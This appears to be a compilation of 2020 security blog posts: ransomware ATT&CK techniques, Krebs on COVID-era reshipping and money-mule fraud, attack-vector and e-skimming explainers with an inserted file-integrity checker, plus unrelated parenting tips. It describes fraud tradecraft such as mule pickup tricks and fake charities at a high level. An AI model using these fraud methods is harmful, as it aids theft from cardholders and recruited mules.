Learn from these articles and identify which technology can give you visibility inside your network. What digital evidence sources do you have, and can you detect fast enough to preserve and respond? If you were not able to prevent the ‘initial access’ stage, make sure you have strong defense-in-depth, with multiple defence technologies in place. In case a ransomware attack does strike your organization, have a proper backup procedure in place so that you can restore operations on your own. For additional ransomware prevention tips please visit

To learn more about how McAfee products can defend against these types of attacks, see our blog on how ENS 10.7 Rolls Back the Curtain on Ransomware.


MITRE ATT&CK techniques observed (technique ID and description):

  • T1107 File Deletion
  • T1055 Process Injection
  • T1112 Modify Registry
  • T1215 Kernel Modules and Extensions
  • T1060 Registry Run Keys / Start Folder
  • T1179 Hooking
  • T1055 Process Injection
  • T1179 Hooking
  • T1124 System Time Discovery
  • T1046 Network Service Scanning
  • T1083 File and Directory Discovery
  • T1016 System Network Configuration Discovery
  • T1012 Query Registry
  • T1082 System Information Discovery
  • T1057 Process Discovery
  • T1063 Security Software Discovery
  • T1047 Windows Management Instrumentation
  • T1035 Service Execution
  • T1075 Pass the Hash




The post Tales From the Trenches; a Lockbit Ransomware Story appeared first on McAfee Blogs.

How Cybercriminals are Weathering COVID-19

In many ways, the COVID-19 pandemic has been a boon to cybercriminals: With unprecedented numbers of people working from home and anxious for news about the virus outbreak, it’s hard to imagine a more target-rich environment for phishers, scammers and malware purveyors. In addition, many crooks are finding the outbreak has helped them better market their cybercriminal wares and services. But it’s not all good news: The Coronavirus also has driven up costs and disrupted key supply lines for many cybercriminals. Here’s a look at how they’re adjusting to these new realities.


One of the more common and perennial cybercriminal schemes is “reshipping fraud,” wherein crooks buy pricey consumer goods online using stolen credit card data and then enlist others to help them collect or resell the merchandise.

Most online retailers years ago stopped shipping to regions of the world most frequently associated with credit card fraud, including Eastern Europe, North Africa, and Russia. These restrictions have created a burgeoning underground market for reshipping scams, which rely on willing or unwitting residents in the United States and Europe — derisively referred to as “reshipping mules” — to receive and relay high-dollar stolen goods to crooks living in the embargoed areas.

A screen shot from a user account at “Snowden,” a long-running reshipping mule service.

But apparently a number of criminal reshipping services are reporting difficulties due to the increased wait time when calling FedEx or UPS (to divert carded goods that merchants end up shipping to the cardholder’s address instead of to the mule’s). In response, these operations are raising their prices and warning of longer shipping times, which in turn could hamper the activities of other actors who depend on those services.

That’s according to Intel 471, a cyber intelligence company that closely monitors hundreds of online crime forums. In a report published today, the company said since late March 2020 it has observed several crooks complaining about COVID-19 interfering with the daily activities of their various money mules (people hired to help launder the proceeds of cybercrime).

“One Russian-speaking actor running a fraud network complained about their subordinates (“money mules”) in Italy, Spain and other countries being unable to withdraw funds, since they currently were afraid to leave their homes,” Intel 471 observed. “Also some actors have reported that banks’ customer-support lines are being overloaded, making it difficult for fraudsters to call them for social-engineering activities (such as changing account ownership, raising withdrawal limits, etc).”

Still, every dark cloud has a silver lining: Intel 471 noted many cybercriminals appear optimistic that the impending global economic recession (and resultant unemployment) “will make it easier to recruit low-level accomplices such as money mules.”

Alex Holden, founder and CTO of Hold Security, agreed. He said while the Coronavirus has forced reshipping operators to make painful shifts in several parts of their business, the overall market for available mules has never looked brighter.

“Reshipping is way up right now, but there are some complications,” he said.

For example, reshipping scams have over the years become easier for both reshipping mule operators and the mules themselves. Many reshipping mules are understandably concerned about receiving stolen goods at their home and risking a visit from the local police. But increasingly, mules have been instructed to retrieve carded items from third-party locations.

“The mules don’t have to receive stolen goods directly at home anymore,” Holden said. “They can pick them up at Walgreens, Hotel lobbies, etc. There are a ton of reshipment tricks out there.”

But many of those tricks got broken with the emergence of COVID-19 and social distancing norms. In response, more mule recruiters are asking their hires to do things like reselling goods shipped to their homes on platforms like eBay and Amazon.

“Reshipping definitely has become more complicated,” Holden said. “Not every mule will run 10 times a day to the post office, and some will let the goods sit by the mailbox for days. But on the whole, mules are more compliant these days.”


KrebsOnSecurity recently came to a similar conclusion: Last month’s story, “Coronavirus Widens the Money Mule Pool,” looked at one money mule operation that had ensnared dozens of mules with phony job offers in a very short period of time. Incidentally, the fake charity behind that scheme — which promised to raise money for Coronavirus victims — has since closed up shop and apparently re-branded itself as the Tessaris Foundation.

Charitable cybercriminal endeavors were the subject of a report released this week by cyber intel firm Digital Shadows, which looked at various ways computer crooks are promoting themselves and their hacking services using COVID-19 themed discounts and giveaways.

Like many commercials on television these days, such offers obliquely or directly reference the economic hardships wrought by the virus outbreak as a way of connecting on an emotional level with potential customers.

“The illusion of philanthropy recedes further when you consider the benefits to the threat actors giving away goods and services,” the report notes. “These donors receive a massive boost to their reputation on the forum. In the future, they may be perceived as individuals willing to contribute to forum life, and the giveaways help establish a track record of credibility.”

Brian’s Club — one of the underground’s largest bazaars for selling stolen credit card data and one that has misappropriated this author’s likeness and name in its advertising — recently began offering “pandemic support” in the form of discounts for its most loyal customers.

It stands to reason that the virus outbreak might depress cybercriminal demand for “dumps,” or stolen account data that can be used to create physical counterfeit credit cards. After all, dumps are mainly used to buy high-priced items from electronics stores and other outlets that may not even be open now thanks to the widespread closures from the pandemic.

If that were the case, we’d also expect to see dumps prices fall significantly across the cybercrime economy. But so far, those price changes simply haven’t materialized, says Gemini Advisory, a New York based company that monitors the sale of stolen credit card data across dozens of stores in the cybercrime underground.

Stas Alforov, Gemini’s director of research and development, said there have been no notable dramatic changes in pricing for either dumps or card data stolen from online merchants (a.k.a. “CVVs”) — even though many cybercrime groups appear to be massively shifting their operations toward targeting online merchants and their customers.

“Usually, the huge spikes upward or downward during a short period is reflected by a large addition of cheap records that drive the median price change,” Alforov said, referring to the small and temporary price deviations depicted in the graph above.

Intel 471 said it came to a similar conclusion.

“You might have thought carding activity, to include support aspects such as checker services, would decrease due to both the global lockdown and threat actors being infected with COVID-19,” the company said. “We’ve even seen some actors suggest as much across some shops, but the reality is there have been no observations of major changes.”


Interestingly, the Coronavirus appears to have prompted discussion on a topic that seldom comes up in cybercrime communities — i.e., the moral and ethical ramifications of their work. Specifically, there seems to be much talk these days about the potential karmic consequences of cashing in on the misery wrought by a global pandemic.

For example, Digital Shadows said some have started to question the morality of targeting healthcare providers, or collecting funds in the name of Coronavirus causes and then pocketing the money.

“One post on the gated Russian-language cybercriminal forum Korovka laid bare the question of threat actors’ moral obligation,” the company wrote. “A user initiated a thread to canvass opinion on the feasibility of faking a charitable cause and collecting donations. They added that while they recognized that such a plan was ‘cruel,’ they found themselves in an ‘extremely difficult financial situation.’ Responses to the proposal were mixed, with one forum user calling the plan ‘amoral,’ and another pointing out that cybercrime is inherently an immoral affair.”

What Are the Main Vectors of Attack in Cybersecurity and How Do They Work?

Today’s dangerous cyber landscape demands that all businesses position themselves ahead of cybercriminals in order to stay safe. This always starts with identifying your weaknesses, understanding how your company may become compromised, and implementing the most appropriate prevention and detection methods that will help you achieve cyber resilience. But first, you have to understand which vectors of attack you may encounter that could disrupt your business.

What are vectors of attack?

Vectors of attack (or threat vectors) refer to the pathway that cyber attackers take to infiltrate your organization. In essence, an attack vector is a process or route a malicious hacker uses to reach a target, or in other words, the measures the attacker takes to conduct an attack.

Typically, attack vectors are intentional threats (rather than unintentional), as they do require some planning and analysis.

Various entities may exploit these vectors of attack, ranging from upset former employees to malicious hackers, cyber espionage groups, competitors, and more. Regardless of the person or group involved, they may want to disrupt your business, steal your technology or confidential information, or extort money from your employees. In any event, they will do their utmost to successfully utilize attack vectors and gain access to your systems.

Attack vectors vs. Attack surface

Attack vectors are the individual methods cybercriminals use to gain unauthorized access to a system, while the attack surface is the total set of attack vectors an intruder could use to take control of, or steal data from, your network or endpoints.

Attack vector examples in cybersecurity

Below I will briefly discuss the most common examples of vectors of attack that can threaten your organization.

#1. Insider Threats

Insider threat is one of the most common attack vectors. Still, not all types of insider threats are malicious, as naïve employees can sometimes inadvertently expose internal data. However, ill-intentioned individuals working for a company may intentionally disclose confidential information or plant malware, driven by various motives and by their own personal gain.

The most recent insider threat statistics reveal alarming issues that need to be considered and addressed by all organizations. For example, insider threats have increased by 47% in the past two years and 70% of organizations are witnessing more frequent insider attacks.

#2. Phishing

Phishing is merely one of many hats that social engineering wears. It involves manipulation tactics adopted by a malicious individual whose ultimate purpose is to trick employees into clicking on suspicious links, opening malware-infected email attachments, or giving away their login credentials.

The most insidious subtype of phishing is spear phishing, where very specific employees are observed in great detail only to be targeted later on by cybercriminals. This phenomenon is also part of the rising threat of Business Email Compromise (BEC), a highly sophisticated practice that can devastate companies of all sizes.

#3. Business partners

Third-party organizations can also become major vectors of attack in cybersecurity.

Some of the biggest security incidents and data breaches have been caused by vendors. Supply chain attacks are a common way for attackers to target a vendor’s customers. This is the reason why organizations large and small together with their business partners must foster a culture where cybersecurity best practices are shared and mutual transparency is demonstrated.

#4. Weak or compromised login credentials

Should your employees’ authentication credentials be too weak or become compromised, they may turn out to be an attacker’s surefire way to gain unauthorized access to your IT systems.

Usernames and passwords are the most popular form of authentication that can easily be abused through phishing, data leaks, and credential-stealing malware, giving intruders free access to your workers’ accounts.

Brute-force attacks (the practice in which attackers submit many password guesses with the aim of eventually finding the right one) are also a serious vector of attack. In the wake of the novel coronavirus pandemic, Heimdal™ Security’s data has revealed that the number of brute-force attacks has increased exponentially. We have noticed a 5% increase in brute-force attacks after the majority of employees started working from home.

#5. Ransomware / Malware

Ransomware continues to be a highly lucrative business for cybercriminals. Given its huge profits, it’s no surprise that ransomware has even developed into a “business” model – Ransomware as a Service. This makes it easily accessible even to people with rather poor technical skills who are nonetheless determined to profit from vulnerable users.

Unpatched vulnerabilities in your systems can allow ransomware to pass through. The most notorious ransomware attacks to date (such as WannaCry and NotPetya) could have been avoided if systems had been patched on time.

At the same time, the huge palette of other existing types of malware can facilitate the infiltration of malicious hackers inside your organization – think about worms, trojans, rootkits, adware, spyware, file-less malware, bots, and many more.

And do keep in mind that everything I’ve listed above refers to only a few vectors of attack that can affect your business.

How to protect your organization from threat vectors

Protecting your business from different attack vectors will not be difficult with the proper resources in place. Below I’ve included the main aspects you should focus on to reduce the risk of threat vectors and prevent potential future attacks.

#1. Educate your employees

We are strong advocates for continuous security education and we believe cybersecurity awareness training sessions should always be mandatory for your employees. Workers should hone their cybersecurity skills periodically, as prevention is key to keeping your business safe in today’s digital landscape. As long as cybercrime continues to thrive and be profitable, cybersecurity training should be a continuous journey inside your company.

Your workers must be taught to recognize the signs of phishing and BEC, create passwords that follow your internal password policy and avoid the most common password mistakes, identify different types of malware, and report cybersecurity incidents and potential threats. You can also try running phishing simulations to help them identify the tell-tale signs of phishing and avoid falling prey to these attacks.

#2. Apply the Principle of Least Privilege (PoLP)

Limiting your users’ rights to the lowest level that still allows them to successfully perform their tasks is the cornerstone of PoLP. This practice closes multiple security holes inside your organization, gives you granular control over the actions performed, and eliminates the danger of insider threats.

For instance, Heimdal™ Security’s Thor AdminPrivilege is a powerful Privileged Access Management (PAM) solution that simplifies the burdensome tasks of sysadmins who now have to manually escalate and de-escalate user permissions.


#3. Use the right cybersecurity tools

Sometimes, even the most knowledgeable employees (cybersecurity-wise) may accidentally click on malicious links or open infected email attachments. And in certain instances, cybercriminals do a great job of masquerading as your employees’ superiors or other authoritative figures and manage to trick them into transferring large amounts of money to their accounts. For this reason, our Heimdal™ Security experts have designed next-gen cybersecurity tools and technologies with very specific vectors of attack in mind, to help organizations avoid multiple attack scenarios.

Prevention, detection, and response are the bedrock of our philosophy. Since it would be impossible to discover every threat individually, we’ve gone beyond signature-based anti-malware solutions that only pick up known threats. As malware attack vectors are ever-growing in size and sophistication, we look at the Internet’s infrastructure to catch threats that traditional antivirus doesn’t see. We’ve developed a highly sophisticated DNS filtering solution that blocks network communication to Command & Control servers, ransomware, next-gen attacks, and data leakages.

At the same time, since we understand the burden of manual patching, we’ve combined Windows and 3rd party software patch management into a single tool to help you remove the risk of unpatched software and systems, all at once.

Thor Premium Enterprise is our EPDR (Endpoint Prevention, Detection, and Response) solution, which combines DNS filtering, Automated Patch Management, and a next-gen Antivirus within a single interface so that you can have a complete overview of your environment.


To Sum Up

To evade threat vectors, organizations must rely on both ongoing employee cybersecurity education and the proper tools.

Adopting a DNS-based approach to security, which analyzes and monitors network threats and is successful in detecting unknown malware and emerging threats, is essential. At the same time, eliminating attack vectors related to unpatched software and systems, as well as properly managing admin rights, will help you neutralize cyber threats before they damage your organization.

The post What Are the Main Vectors of Attack in Cybersecurity and How Do They Work? appeared first on Heimdal Security Blog.

Targeted Phishing Attacks Successfully Hacked Top Executives At 150+ Companies

In the last few months, multiple groups of attackers successfully compromised corporate email accounts of at least 156 high-ranking officers at various firms based in Germany, the UK, Netherlands, Hong Kong, and Singapore. Dubbed 'PerSwaysion,' the newly spotted cyberattack campaign leveraged Microsoft file-sharing services—including Sway, SharePoint, and OneNote—to launch highly targeted

Maintaining POS Device Security and Cleanliness

With the global spread of COVID-19, awareness about the potential risks associated with touching public-facing surfaces has intensified. Many merchants are working harder than ever to protect their customers by frequently cleaning common touch points in their stores. One of these common surfaces is the point-of-sale (POS) payment terminals where customers swipe or dip their payment card and potentially enter a PIN to confirm their purchase.

Exclusive survey: What 400 IT leaders really think about the COVID-19 crisis

A crisis on the scale of the one we’re facing demands decisive action. Luckily for many IT leaders, the first move was easy: When COVID-19 work-from-home mandates hit, those with the right policies and infrastructure in place endured the massive shift to remote work with minimal disruption. Add VPN capacity, videoconferencing, and a healthy dose of candid communication, and productivity can remain relatively unscathed.

The really tough part is planning ahead. When you’re staring into the crater where the economy used to be, crossing your fingers that the Fed’s trillions will fill it, how do you budget for the coming year? Which projects should go forward and which should be scrapped or delayed when so many unanswered business questions loom?

To read this article in full, please click here

Critical Bugs Found in 3 Popular e-Learning Plugins for WordPress Sites

Security researchers are sounding the alarm over newly discovered vulnerabilities in some popular online learning management system (LMS) plugins that various organizations and universities use to offer online training courses through their WordPress-based websites. According to the Check Point Research Team, the three WordPress plugins in question — LearnPress, LearnDash, and LifterLMS —

Cato SDP: Cloud-Scale and Global Remote Access Solution Review

The Scouts acknowledged the necessity to "Be Prepared" over 100 years (!) ago; the industry should have, as well. Yet COVID-19 took businesses – more like the entire world – by surprise. Very few were prepared for the explosion of remote access, and the challenge of instantly shifting an entire organization to work from anywhere. Cato Networks shared its increase in remote access usage post

COVIDSafe App Teardown & Panel Discussion


I've written a bunch about COVID-19 contact tracing apps recently as they relate to security and privacy, albeit in the form of long tweets. I'm going to avoid delving into the details here because they're covered more comprehensively in the resources I want to consolidate below, firstly the original thread from a fortnight ago as news of an impending app in Australia was breaking:

On Sunday night, that app finally landed here, branded as COVIDSafe. I installed it the day after, capturing a bunch of my own thoughts and linking to efforts from the community to dissect what it was actually doing:

The efforts of fellow community members (several of them fellow Microsoft MVPs) garnered a lot of attention so we banded together to run a public panel yesterday. That 2-hour panel discussion has now been published to YouTube and it's chock-a-block full of real world observations about what the app actually does, what it collects, what it sends and what the real world privacy and security implications are. I loved being a part of this panel as it allowed us to step away from the speculation and conspiracy theories and instead focus on the facts of how the thing works. None of us have any commercial interests in this (we all went through a disclosure process in the video), it's just pure independent, fact-based discussion. Enjoy:

List of data breaches and cyber attacks in April 2020: 216 million records breached

With only 49 reported data breaches and cyber attacks this month, you might have thought April was a calm month in the cyber security department.

Of course, that couldn’t be further from the truth, with organisations being turned upside down amid the coronavirus pandemic and cyber criminals thriving on the uncertainty.

So how can we account for the dip in reported data breaches? It’s simple: many organisations have been shuttered – or operating in a more limited way – during the pandemic and either aren’t performing actions that could jeopardise their security or haven’t detected an incident.

Among organisations that have remained open, the threat is more severe than ever. You can take a look at every reported incident that accounts for April’s 216,141,421 breached records here.

As always, incidents affecting UK organisations are listed in bold. Meanwhile, you can stay up to date with the latest news by subscribing to our Weekly Round-up or visiting our blog.

Cyber attacks


Human error is to blame for 88% of data breaches in the UK

Data breaches

Financial information

Malicious insiders and miscellaneous incidents

In other news…


The post List of data breaches and cyber attacks in April 2020: 216 million records breached appeared first on IT Governance UK Blog.

Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations


No One is Invisible to Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations 

In this challenging time, cybercriminals have their eyes on consumers and institutions alike. Malicious groups have increased their targeting of hospitals and healthcare entities to take advantage of deepening resource strain. Many of these groups are using ransomware attacks to compromise hospital systems, locking up patient records or vaccine research until a hefty ransom is paid. The requested sum is usually a high value of Bitcoin or alternative cryptocurrencies, as these are typically more difficult to trace.

However, unlike with old tax paperwork or private family photos, the impact of losing or mass distributing patient records could literally mean life or death for those awaiting urgent care or diagnosis. Bad actors count on this urgency to guarantee that their ransom is met.

Be wary of old tactics with a new twist 

The tactics these cybercriminals use can be a combination of traditional phishing and vulnerability exploitation. Reportedly, the WHO has seen a twofold increase in phishing attacks by cybercriminals attempting to steal credentials. Some ransomware groups have stated they will avoid targeting hospitals given the current strain on healthcare systems. Still, claims from criminal organizations should be taken with a hefty grain of salt.

Keep your security up to date 

In the meantime, McAfee Advanced Threat Research is closely monitoring new threats that aim to take advantage of the uncertainty surrounding the pandemic. The team has analyzed these threats based on geography, and will continue to report further findings. While these threats are not unexpected as cyber criminals always try to leverage large events to their advantage, it is disappointing to see at a time when the world needs to come together that there are those who have scant regard for the sense of community. 

Stay ahead of malicious threats 

Whether you’re a healthcare professional, a family provider, or both, here are some tips that can help you stay ahead of malicious tactics being used to attack individuals and healthcare institutions:

  • Secure your home network by checking your device passwords and Wi-Fi password. Make sure your system and software are all up to date, and take the time to perform pending updates.
  • Avoid clicking on emails and texts from unknown senders. Be wary of any communication coming from “official” sources that encourages urgent action on provided links or asks for your login credentials.
  • Check in often with family and friends and be their technical advisor if needed to help steer them away from social engineering or spammy phishing. Consider using a free safe-browsing extension that can help steer you away from illegitimate sites.
  • Be sure to set up robust security on devices that may now be seeing a lot more online time.
  • Don’t forget your phone: stay protected from malicious apps and smishing/vishing attempts.

The post Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations appeared first on McAfee Blogs.

School From Home: Project-Based Learning


If keeping your kids on task and engaged with schoolwork from home is proving to be a challenge, you aren’t alone. We recently surveyed families and found that keeping kids focused was at the top of parent concerns right alongside establishing a routine. Just as school-aged kids can often struggle with homework completion during a normal school year, the challenges are magnified right now at home. If you’re a parent living through this pain right now, here’s something that can help: project-based learning.

Like adults, kids often engage more authentically with project-based work that they feel connected to on a personal level. Finding those connections without the in-person presence of a teacher to help create context makes it all just a little (or a lot!) harder for many of us right now as we try to make sure our young scholars are continuing to engage with learning.


How are your children spending their time?

Depending on grade level and the number of weeks your student has been learning from home, you might be encountering varying levels of work assigned by teachers and varying levels of work completed by your kids. Assignments from school might be non-negotiable for many students, especially high school-aged kids who are receiving credit and, in some cases, preparing for high-stakes tests such as AP exams, being taken this year from home.

If your personal situation at home is one of optional assignments or work from school that’s finished quickly leaving your student bored or going on autopilot on a device, here’s a self-directed project almost any age child can enjoy: Genius Hour. It’s relatively easy to get started and best of all, there’s no grading at the end!

Project-Based Learning That Gets Kids Motivated

Genius Hour (sometimes known as 20% time) is a concept implemented at some innovative companies like Google in which employees take 20 percent of the work week to pursue projects of their own interest. Many teachers in recent years have adopted the practice as a way to increase engagement among students by giving them time to explore a project of their own choosing while connecting components of the project to scholastic skills connected to research, critical thinking, reading, writing, and presentations. Teachers set certain requirements to keep the expectations high and then provide resources and guidance along the way.

How does Genius Hour work?

Here’s a quick snapshot of how Genius Hour works—followed by a few details and some helpful links to help you get your child started:

  • Choose a topic you’re interested in.
  • Form a guiding question to focus your study.
  • Decide how you’ll show what you’ve learned.
  • Look for resources and start learning.
  • Present your project.

Choose a Topic and Create a Guiding Question

An important part of Genius Hour is forming a question to focus and guide a student’s study. To maximize engagement and focus, kids should choose a subject they would genuinely like to explore. Topics are wide open and do not need to relate directly to any current study from school, so your child’s topic can connect to current interests or a new curiosity.

Genius Hour for Young Kids

For young kids, a topic like weather or pets could, with parent help, be focused by a guiding question like “How do bodies of water impact weather?” or, “What animals make good pets?” Younger children might connect most readily to subjects they’re learning about at school such as weather, rocks and minerals, or farm animals.

Genius Hour for Students

Older students should be able to come up with many areas of interest that might be spurred by what they’re learning at school or topics entirely of their own choosing. A young student musician, for example, may be interested in a particular musical genre like hip hop or jazz. She might then form an essential question to focus her study along the lines of “What are the influences on today’s most successful hip hop artists?” A student interested in physical fitness or a student missing their sports practices might pose a question for study like “What home workouts are best for keeping fit for my sport?”

Decide How to Show What You Know

At the end of this project, students create something—a slideshow on the computer, a drawing, a diagram, a photo series, a song, a poem, a video, a podcast, or a poster—to show their learning. Creating an artifact allows students to synthesize their learning in a creative way. And that artifact can be as broad and varied as the materials the student has access to. Anything works, high tech or on paper. The medium really doesn’t matter, because the learning occurs as a natural part of the process.

Track Down Resources and Start Learning

Equipped with a topic of interest and a guiding question, your child can begin exploring resources from right at home. Researching online is an obvious first step—but consider some other avenues too. You can also point your child toward movies or documentaries connected to both topic and guiding question. And who knows, you may also have some useful books or magazines around the house too. Other options beyond going online for research include conducting interviews on the phone or through video conferencing. Help them think beyond the screen, at least for starters.

Research online

As for resources online, many museums now offer virtual tours of their collections. While we can’t travel there in person, the Smithsonian National Museum of Natural History offers a number of virtual tours online, and the National Park Foundation will take you on a virtual visit to the national park of your choosing.

Is your young athlete missing sports? Local gyms and community centers may have exercise and workout programs online for kids who’re interested in fitness-related topics. Likewise, most pro organizations currently have added content on their websites like the official site for Major League Baseball where you’ll find history, videos from past games, and even mascot origin stories.

If your child is interested in exploring the world, National Geographic Kids has an abundance of online resources. Older kids can explore magazine and newspaper websites as well, and many currently offer free access. In addition, video learning from YouTube can be a wonderful resource depending on age, access, and parental guidance.

Internet safety for kids

As with any work your children are doing online, now’s an excellent time to remind them how to be particularly safe when exploring resources online. They’ll want to watch out for fake apps, risky links, and sketchy downloads as they always do—particularly now, as hackers have keyed into the increase in schooling at home and are looking to take advantage. A comprehensive security solution will help them look after their safety and privacy.

Share What You’ve Learned

Once your child has spent time reading, viewing, listening, and learning, it’s time to create an artifact to show what they’ve learned. See possibilities listed above, because the final step in the Genius Hour project is to share the learning.

Usage of video conferencing

Anyone at home can sit in on the audience and even an audience of one works just fine. If you like, you can invite other friends and family with a quick video conference so that they can participate too. This offers kids a great way to connect with extended family members like grandparents or even their friends from school. (Imagine a few parents getting together and having all of their kids present their projects and then hanging out for an online chat after that …)

During the presentation, students share their topic, why they chose it, their guiding question, their artifact, and what they learned. In the classroom, a teacher would then engage students in a reflection of the process from start to finish. You can do something very similar by following up with questions from the audience, whether they’re in person or online. This is a wonderful way to close the journey and for everyone to gain something from the process.

Duration of Genius Hour

Genius Hour is highly adaptable and can take a few days or several weeks. It can be low-tech or high-tech depending on resources and preferences. For kids with time on their hands and parents who want a little extra focused learning and engagement, this project just might fit the bill. Check out this article to learn more about Genius Hour in the classroom.


Stay Updated

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.



The post School From Home: Project-Based Learning appeared first on McAfee Blogs.

What E-Commerce Sites Can Learn from the Covid-19 Pandemic

For the last few years, cybersecurity experts have been sounding the alarm on something called e-skimming. In this kind of attack, hackers intercept payment card data and personal information from e-commerce sites by exploiting the architectural complexity of those e-commerce sites. 

While there have been several major breaches that were the result of e-skimming, including Macy’s and British Airways, the bulk of these hacking campaigns have been attributed to an individual or group of hackers known as Magecart. They usually target the Magento platform, often by injecting rogue code into outdated plugins and extensions for websites.

Magento isn’t the Covid moment here. E-skimming is. 

Enter WooCommerce 

Security researchers discovered what could be a game changer in e-skimming attacks earlier this month, one that exponentially expands our collective attackable surface.

Magento has about a 12% market share and represents less than 1% of the entire assemblage of code that comprises the Internet. 

The discovery I mentioned is that a new e-skimming hack has been targeting WooCommerce, which is a far more ubiquitous online shopping plugin used in 26% of all e-commerce sites. WooCommerce is native to and powered by WordPress, a platform that represents over 35% of websites currently online. It would be hard to find a larger attackable surface on the Internet.

The threat posed by a hack targeting WooCommerce isn’t bad only because of the technology’s ubiquity. The issue has to do with who uses it. The quick answer is: Anyone. Contrast that with Magento, which is designed for enterprise-level sites that have detailed inventory needs and other layers of complexity. Magento requires installation, development, and maintenance by trained web professionals certified by the company to understand its many nuances. 

WooCommerce, on the other hand, is easy to use and install; a user with little to no experience building websites—and even less knowledge of cybersecurity best practices—can use it to get an e-commerce site up and running with ease. 

This would be a bad situation in normal times, but with the Covid-19 pandemic making many businesses more reliant on e-commerce and virtual transactions, the potential for an increase in poorly secured websites built on the fly is a matter for concern. 

That said, the bigger issue may be the nature of the hack itself. While e-skimming attacks have usually involved the compromise of vulnerable third-party software, this attack injects malicious code into the core source code of WooCommerce itself, which makes it much harder to detect, particularly for non-expert site builders.

“With credit card swipers it’s common for attackers to simply include/append malicious javascript from a third-party website,” said Sucuri researcher Ben Martin, who first wrote about the attack. “The fact that the malware lodged itself within an already existing and legitimate file makes it a bit harder to detect.”

There are parallels with the early days of the Covid-19 pandemic. A relatively familiar threat has surfaced in a more dangerous form that is harder to detect and has the potential to impact a significantly larger number of victims. 

Like Covid-19 in January, the current WooCommerce hack is a nascent threat, but unlike the virus, you can prepare for the threat and mitigate the potential damage. 

A good place to start is for businesses and consumers to use a system I call the 3 Ms:

Minimize the Threat: Businesses doing e-commerce need to keep their website and security software up-to-date. Those companies that have the technical know-how should run regular scans for the presence of rogue code on their websites. If they don’t have that resource in house, they would be well advised to hire a cybersecurity expert to do it for them. Most important is to practice good data hygiene, especially when relying on a remote workforce. A single login and password hooked by a phishing email could provide hackers with the necessary credentials to compromise a website, as well as its customer and payment data. 
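As an added example (not code from the original article), the kind of "regular scan for rogue code" mentioned above can be as simple as a file-integrity check: hash every file of a known-clean plugin install once, then periodically compare the live install against that manifest and report anything modified, added, or removed. The directory layout and file contents below are constructed for the demo.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large assets don't need to be read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path) -> dict:
    """Map each file under root (relative, POSIX-style path) to its SHA-256.

    Run this against a fresh, known-clean install and store the result
    somewhere the web server cannot write to.
    """
    manifest = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            rel = str(p.relative_to(root)).replace(os.sep, "/")
            manifest[rel] = sha256_of(p)
    return manifest


def check_integrity(root: Path, manifest: dict) -> dict:
    """Compare the live tree against the stored manifest.

    A legitimate file whose hash changed (the case the Sucuri quote describes)
    shows up under "modified"; unexpected new files under "added".
    """
    current = build_manifest(root)
    return {
        "modified": sorted(k for k in manifest if k in current and current[k] != manifest[k]),
        "missing": sorted(k for k in manifest if k not in current),
        "added": sorted(k for k in current if k not in manifest),
    }


def demo() -> dict:
    """Constructed scenario: baseline a tiny plugin tree, then tamper with it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "assets" / "js").mkdir(parents=True)
        checkout_js = root / "assets" / "js" / "checkout.js"
        checkout_js.write_text("function checkout() { /* legitimate plugin code */ }\n")
        (root / "readme.txt").write_text("Constructed plugin readme\n")

        baseline = build_manifest(root)  # taken while the install is clean

        # Simulate what an integrity scan is meant to catch: a legitimate file
        # silently extended, a new file dropped in, and a file removed.
        checkout_js.write_text(checkout_js.read_text() + "// unexpected appended block\n")
        (root / "assets" / "js" / "extra.js").write_text("// file not in baseline\n")
        (root / "readme.txt").unlink()

        return check_integrity(root, baseline)


if __name__ == "__main__":
    for category, files in demo().items():
        print(f"{category}: {files}")
```

The manifest should be rebuilt after every legitimate update, and any "modified" hit on a file the update did not touch deserves a manual look.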

When making payments online, consumers should use credit cards instead of debit/bank cards, which can provide hackers a direct conduit to their bank accounts.

Monitor Accounts: Keep track of your bank and credit card accounts to know as quickly as possible when something isn’t right. The most effective way to do this is to sign up for transaction monitoring—offered for free by banks, credit unions and credit card companies—which notifies you of any activity in your credit or bank accounts.

Manage the Damage: If a business falls prey to an e-skimming campaign, it’s crucial to act as quickly as possible to alert the authorities, notify consumers and identify the source of the hack. Customers affected by an e-skimming breach should immediately contact their payment card companies, request new cards, and lock down any potentially impacted accounts.

Malware and viruses are opportunistic. With more businesses relying on e-commerce to make up for shuttered physical storefronts, newly remote workers struggling to secure their home offices from cyberthreats, and more customers using e-tailers for their day-to-day shopping, the circumstances are ideal for a new strain of malware to spread. 

The post What E-Commerce Sites Can Learn from the Covid-19 Pandemic appeared first on Adam Levin.

Getting Started With Base64 Encoding and Decoding

Hello and welcome. My name is John Strand and in this video, we’re going to be talking about Base64 encoding and decoding. Now the reason why we’re talking about it is once again we have the BHIS Cyber Range for our customers and friends and this is just basically a video to walk people through […]

The post Getting Started With Base64 Encoding and Decoding appeared first on Black Hills Information Security.

Is Zoom Safe to Use?

With the majority of the world having been in quarantine and self-isolation for over a month now, we’ve grown accustomed to working from home and employing technology to communicate virtually with our colleagues and acquaintances, which includes everything from social media platforms to hanging out on Google.

Having said that, Zoom, the online conference call application, has skyrocketed in popularity, as indicated by the fact that its daily active users have increased by a staggering 67%. With millions of individuals in lockdown globally, Zoom has emerged as a highly valuable tool, one which also helps maintain a semblance of normalcy amidst the uncertainty looming over our heads in the form of the COVID-19 pandemic.

By this point, whether you’ve wanted to or not, chances are that you’ve been part of at least one conference call, class, or even a fitness session on Zoom. Although the online video conferencing application might be nothing short of a godsend if you’re a teacher or a team manager, as the number of people using Zoom increases, so will the security problems associated with it.

Since Zoom is a fairly new application, most individuals tend to overlook the security loopholes present within the application and continue with their online conferencing business as per usual. The consequences of foregoing security on Zoom, however, can be dire, as is further made evident by the multiple stories circulating about “Zoombombing”, along with several teachers experiencing disruptive behavior, where users broadcast pornographic, hateful, or racist content in between sessions. Moreover, there have been several accounts of private meetings being hijacked by the presence of an intruder.

